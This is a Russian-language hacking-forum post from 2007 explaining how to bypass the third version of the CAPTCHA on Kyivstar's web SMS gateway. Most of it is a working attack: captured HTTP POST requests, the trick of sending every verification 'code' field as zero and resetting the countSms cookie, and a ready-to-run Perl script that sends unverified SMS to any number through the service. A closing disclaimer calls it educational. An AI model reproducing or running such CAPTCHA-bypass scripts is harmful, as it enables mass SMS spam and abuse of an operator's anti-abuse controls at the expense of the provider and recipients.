Форум АНТИЧАТ - kyivstar CAPTHA III

обход CAPTCHA III

Краткая история CAPTCH''
~~~~~~~~~~~~~~~

-CAPTCHA I

Самая первая каптча была банально простой ,баг был в том, что кодеры немного промахнулись и влепили код подтверждение прямо в куки , об этом можно немного почитать здесь _http://forum.antichat.ru/thread36930-dspam.html

-CAPTCHA II
Упустим этот раздел.
Пусть останется в секрете ее обход (давно уже переделали ;) )

-CAPTCHA III
//После обсуждений киевстара с "vvs777" (03.08.2007)
началось самое вкусное ,зайдя сегодня ночью на форум узнав что снова переделали на kyivstar.net каптчу решил на это взглянуть
Впечатление было ужасное .
После набранного номера и теста , нажав отправить я был в недоумении "Вкажіть 2 картинки живої природи",я подумал уже что
обхода уже не найти ,решил все-таки указать эти две картинки , врубил пакетолов .
И что я увидел:

Код:

POST /_sms/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*

Referer: http://kyivstar.net/_sms/?lang=ua

Accept-Language: ru

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Host: kyivstar.net

Content-Length: 240

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger



submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXX&lat=1&message=111122&code=1186099766&code=96055154&code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085&code=0102

Ненашев нечего интересного (кроме каких-то 3-х сообщений в куках :))

Код:

Cookie: countSms=3;

,покопавшись, попробовал передавать везде 0

Код:

POST /_sms/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*

Referer: http://kyivstar.net/_sms/?lang=ua

Accept-Language: ru

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Host: kyivstar.net

Content-Length: 240

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger



submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXXX&lat=1&message=111122&code=0&code=0&code=05&code=0

Тем хто непонял
я заменил ключи (которые генерируются фиг знает, каким способом )

Код:

code=1186099766

code=96055154

code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085

code=0102

Заменил на

Код:

code=0

code=0

code=0

code=0

После отправки модифицированного пакета на мой телефон пришло сообщение :)

Ниже приведу простой пример отправки сообщение на перле..

Код:

#!/usr/bin/perl  

# 03.08.2007

# http://mobilnik.ua/news/12301.html  :) 



use LWP;

use LWP::UserAgent; 

use strict;

my $browser = LWP::UserAgent->new;                            

   $browser->agent('New captha v3.0');        

   #$browser->proxy(['http'] => 'http://61.47.2.249:8080');  

print q(

         -------------------------------------- 

        |                          | - | + | x |

         -------------------------------------- 

        |   specical for antichat.ru   _______ |

        |   ------------------------- |       ||  

        |      icq:212-905-288        |   ?   ||

        |   ------------------------- |_______||

         -------------------------------------- );



    

my $mob_code     = "097";

my $mob_number   = "XXXXXXX";

my $messenge     = "hello antichat.ru";

my $curr_cookie  = "countSms=0; 

                    isUserLogined=false; 

                    countSms=0; 

                    messageID=20070702223308.610CC7%40messenger";



printf "\n\n\t[+]Send   %s-%s \n\tmessage:  \<<%s\>> ",

        $mob_code,$mob_number,$messenge ;

    

my $url="http://kyivstar.net/_sms/?lang=ua";

my $response = $browser->post($url,

     ["submitted"  =>  "true",        

      "lang"        =>  "ua",

      "sms_adv"     =>  "101",       

      "mobcode"     =>  $mob_code,

      "number"      =>  $mob_number, 

      "lat"         =>  1,

      "message"     =>  $messenge,

      "code"        =>  0,

      "code"        =>  0,

      "code"        =>  0,

      "code"        =>  0],

      "Content-Type"=>  "application/x-www-form-urlencoded",

      "Cookie"      =>  $curr_cookie);

Важно :
1-Материал исключительно в ознакомительных целях!
2-Автор этой статьи не несёт ответственность за возможные последствия использования материала в целях, запрещенных УК Укр. и нормами международного права.